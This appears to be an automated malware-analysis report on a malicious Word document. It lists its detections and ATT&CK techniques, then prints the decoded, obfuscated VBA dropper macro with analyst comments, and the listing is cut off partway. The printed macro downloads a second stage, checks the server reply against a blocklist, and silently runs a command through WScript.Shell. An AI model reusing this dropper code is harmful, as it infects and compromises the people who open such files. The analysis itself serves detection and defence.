MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros use CreateObject to instantiate WScript.Shell and then execute a command that downloads and runs a second-stage payload from a URL. The document also contains a lure to trick the user into enabling macros, which is a common tactic for malware droppers.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6434968-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Dropper.Agent-6434968-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROS — Document contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call
-
Macro/content-enable lure medium SE_ENABLE_LURE — Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: c1f608c7055c0675383fa81f92092e1120759ef36fe3c19975c878cf1a2e5070) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7978 bytes |
Preview script — First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' The Attribute lines above are the exporter's header for the document-level
' ThisDocument module (decoded by oletools.olevba); they describe the module,
' not the payload. Everything below is the dropper's obfuscated VBA, in which
' a(<scrambled text>, n, m) is a string-decoding helper defined outside this
' excerpt — none of the decoded values are visible here.
' Run-once flag: YwUnuOy tests it and then sets it, so the payload chain
' executes at most once per document session.
Dim BDKpq As Boolean
' Trigger entry point. The signature (Long, IInkRectangle) looks like an ink
' event handler, but neither argument is used; it only forwards to the
' run-once gate YwUnuOy.
' NOTE(analyst): how this procedure is bound to an event is not visible in the
' excerpt — confirm against the full module and the document's other parts.
Public Sub Kophy_Painted(ByVal bdEpgC As Long, ByVal qXcQz As IInkRectangle)
YwUnuOy
End Sub
' Run-once gate: returns immediately if the module-level flag BDKpq is already
' set, otherwise sets it and starts the main sequence EgrgF. Re-triggering the
' entry point therefore does not re-run the payload chain.
Public Sub YwUnuOy()
If BDKpq Then Exit Sub
BDKpq = True
EgrgF
End Sub
' Main dropper sequence. "On Error GoTo miIENA" targets a label that sits
' immediately before End Sub, so any runtime error raised below — including the
' explicit Error 101 / 105 / 106 calls in DQHGRdA and ThTlVi — ends the routine
' silently with no dialog. The pre-flight procedures are thus abort gates: if
' one of them fails, the CreateObject/Run lines are never reached.
Public Sub EgrgF()
On Error GoTo miIENA
' iUWgY, PPIfkW and eYNWvP are defined outside this excerpt; DQHGRdA and ThTlVi
' are shown further down in this module.
iUWgY
DQHGRdA
PPIfkW
eYNWvP
ThTlVi
' NlGpq returns an a()-decoded ProgID; the report summary identifies the object
' as WScript.Shell. IjRSE is not in this excerpt — presumably it returns the
' created object unchanged (verify against the full module).
Set bQywJq = IjRSE(CreateObject(NlGpq))
' Executes the decoded command string QpeFzdA (defined outside this excerpt).
' With WScript.Shell, a window-style argument of 0 runs the command without a
' visible window. For detection, the observable is the Office process creating a
' child process through WScript.Shell.Run after the network request in hoieJ.
KobOQn bQywJq.Run(QpeFzdA, 0)
Exit Sub
miIENA:
End Sub
' Content gate on the response fetched by hoieJ. The response must contain one
' a()-decoded marker string (otherwise Error 105) and must not contain any of
' the fifty decoded strings in the TUwMDq list (otherwise Error 106). Both
' errors are swallowed by the caller's On Error handler in EgrgF, so a failed
' gate simply ends the run.
' NOTE(analyst): the decoded values are not visible in this excerpt. The shape
' of the second check (abort if any listed substring appears in the server's
' reply) suggests the server reply is used to decide whether to continue —
' decode TUwMDq and the marker to confirm what is being matched.
Public Sub ThTlVi()
jSkGzH = hoieJ
If Not loHPp(jSkGzH, a("LoWAOENAxjsbCAI", 98, 139)) Then Error 105
If zdRgYC(jSkGzH, TUwMDq) Then Error 106
End Sub
' Downloader. Creates a COM object from an a()-decoded ProgID and issues one
' request: Open(lvXko, CFmQUEa, jcJWP) with jcJWP always False, two
' SetRequestHeader calls, then Send. Returns ResponseText only when Status is
' 200; on any other status the function's default empty string is returned.
' NOTE(analyst): the decoded ProgID, verb, URL and header values are not
' visible here. The Open / SetRequestHeader / Send / Status / ResponseText
' members match the WinHttpRequest / XMLHTTP object model, and a False third
' Open argument in that model is the async flag (i.e. a synchronous call) —
' decode to confirm. CFmQUEa is the URL argument and is the network IoC to
' extract; the two header name/value pairs give a request-signature IoC.
Public Function hoieJ() As String
Set mClCXf = CreateObject(a("qnHN5einr.RWiCtp.WxstpjiettC1uHtt.", 131, 221))
' pEAHI is an empty Sub used only to invoke a method and discard its result.
pEAHI mClCXf.Open(lvXko, CFmQUEa, jcJWP)
pEAHI mClCXf.SetRequestHeader(pGOvuh, WILONqM)
pEAHI mClCXf.SetRequestHeader(a("A-resUQUbvreGJtneg", 35, 41), a("S 0WdsT. in5)OiMia.(mtl I7;io 0Tdt.sSPol/0cpieME. nwN6;re/0nPszl4 oab;", 521, 583))
pEAHI mClCXf.Send
If mClCXf.Status = 200 Then
hoieJ = mClCXf.ResponseText
End If
End Function
' Decoded constant: the name of the first request header set in hoieJ
' (plaintext not visible in this excerpt).
Public Function pGOvuh() As String
pGOvuh = a("LrerefeRzFcHiOP", 89, 22)
End Function
' Decoded constant: the value of the first request header set in hoieJ
' (paired with pGOvuh; plaintext not visible in this excerpt).
Public Function WILONqM() As String
WILONqM = a("mnpYwmyP/.espicdha/-Qw/-u/c-ssnartxlaM.eiWwomQ:dtetmodz", 567, 126)
End Function
' Decoded constant passed as the second argument of Open in hoieJ, i.e. the
' request URL. The plaintext is not visible in this excerpt; decoding it yields
' the second-stage download location referenced in the report summary.
Public Function CFmQUEa() As String
CFmQUEa = a("/ct.aTe/tdav.z/scixpwmot1xmo/y.h2mkg:ino/wemp/mSiw", 121, 531)
End Function
' Always False. Used as the third argument of Open in hoieJ (the async flag in
' the WinHttpRequest / XMLHTTP signature — presumably a synchronous request).
Public Function jcJWP() As Boolean
jcJWP = False
End Function
' Decoded constant passed as the first argument of Open in hoieJ, i.e. the HTTP
' method (plaintext not visible in this excerpt).
Public Function lvXko() As String
lvXko = a("EnVTcazkGcr", 102, 74)
End Function
' Case-insensitive substring test: True when QTesVAF occurs anywhere in rHglo
' (both sides upper-cased; InStrRev returns 0 only when there is no match).
' An empty QTesVAF is found at the end of any string, so it also yields True.
Public Function loHPp(ByVal rHglo As String, ByVal QTesVAF As String) As Boolean
loHPp = InStrRev(UCase(rHglo), UCase(QTesVAF)) <> 0
End Function
' True if any element of the collection iJGjAh is a (case-insensitive)
' substring of rHglo, via loHPp; False otherwise (the Boolean default when the
' loop completes without a match). Used by ThTlVi with the TUwMDq blocklist.
Public Function zdRgYC(ByVal rHglo As String, ByVal iJGjAh) As Boolean
For Each QTesVAF In iJGjAh
If loHPp(rHglo, QTesVAF) Then GoTo epkvdl
Next
Exit Function
epkvdl:
zdRgYC = True
End Function
' Empty sink: accepts one argument and does nothing. hoieJ passes method calls
' to it so the call is made and the return value discarded.
Public Sub pEAHI(ByVal TYzTTTW)
End Sub
' Builds the blocklist consulted by ThTlVi: fifty a()-decoded strings in an
' Array, wrapped by KobOQn. KobOQn is defined outside this excerpt (it is also
' used as a call wrapper in EgrgF), so it presumably returns its argument
' unchanged — verify against the full module. The plaintext entries are not
' recoverable from this excerpt; decoding them reveals which substrings in the
' server's reply cause the chain to abort.
Public Function TUwMDq()
TUwMDq = KobOQn(Array(a("wrrLotfnhc crpJIo", 88, 168), a("tONTsRLyeYOotCUngnHkGisNI E", 221, 265), a("llJqMtO UBqJZAAcE", 144, 26), a("eNhOxTIjOyPbRAuR", 153, 22), a("bmHtluavMVHrhKS", 149, 129), _
a("ToOlVYemaAkKRPkcWHsUCKBqB", 56, 172), a("xckXgeSRlopAXeACK", 21, 160), a("EJEToNqqarTdBCvRaW", 113, 191), a("wTsUrtFAHBniXAevA", 169, 90), a("toYVwhF CsZAPsj", 152, 16), _
a("Cg vBdOknRHeCGrixTM", 187, 93), a("GIshOWbsnToGsfd", 157, 93), a("mooUgoeNlaudyANSa", 107, 111), a("bpFZncXNOottefmirx", 43, 38), a("DEuDAuoidOEtSPcSL", 126, 88), _
a("rrpduTCBnyqIWeotMz", 31, 167), a("foisJFTpRoewoNbppf", 29, 141), a("gvMlgSbUaemerEAiSsO", 49, 192), a("EzSVCCwEeCbLrr", 89, 16), a("sErBLllNBGLops ,Te", 197, 163), _
a("wafIentCMXRxvO", 25, 47), a("SEMgAtcIDAwAmxGf", 133, 162), a("iXaneSazoFKmoe", 145, 104), a("EcGNAdISaRamkdMc", 171, 36), a(" scqeDnUTOeDrATTGai", 135, 201), _
a("vkjGrYILATiPSoHe", 143, 62), a("odbcBujMlWDEN", 96, 133), a("AVOneIstYOEffRfj", 99, 65), a("ZLdLfreNzTeHbaf", 104, 116), a("EdzdSuCKALLceFR", 32, 77), _
a("seTiCrsftHnqtMOd", 103, 55), a("olQhrEcnXodRALu", 142, 82), a("rleIeOyueSvFcie", 17, 116), a("vPQenfdiOalOrDEETBj", 104, 207), a("PceCFMGfSINeXHw", 128, 158), _
a("ioeteMwPrrSDIsvNVtROAkAN", 157, 103), a(" pCEaAYCllFEtONCo", 157, 171), a("XACMGgnTRLYG", 67, 61), a("sohLLqhmiUSDet", 69, 100), a("AHiTAOceUlBCcYDw", 143, 122), _
a("isyTeUycWJutjRiQ", 163, 97), a("EmNrEvOgPLrMrYFRtN", 143, 79), a("itsNRVVIujeCTNiRdY", 95, 80), a("czPvoCSOhgFEi", 20, 70), a("eavpnAJrCQDttQyEDf", 187, 106), _
a("HsQdJyPf.HLepcIoEW", 185, 171), a("tlhrMFOcajeosJ", 65, 54), a("rHClilMtefoOCSgOV", 49, 40), a("YiwIMEzDneCjDBME", 151, 94), a("EeoBaPgSFIeiVwLn", 67, 110)))
End Function
' Decoded constant used as the ProgID for CreateObject in EgrgF. The report
' summary identifies the resulting object as WScript.Shell; the plaintext is not
' visible in this excerpt.
Public Function NlGpq() As String
NlGpq = a("qc.laStluWpeNEihHTrSG", 227, 51)
End Function
' Pre-flight gate: raises Error 101 when JRfFOxN is less than KgmNAJ, which the
' On Error handler in EgrgF turns into a silent abort of the whole chain.
' NOTE(analyst): JRfFOxN is cut off by the preview and KgmNAJ is not in this
' excerpt, so what quantity is being compared cannot be determined here —
' inspect the full module to see which environment property gates execution.
Public Sub DQHGRdA()
If JRfFOxN < KgmNAJ Then Error 101
End Sub
Public Function JRfFOxN() As Integer
... (truncated)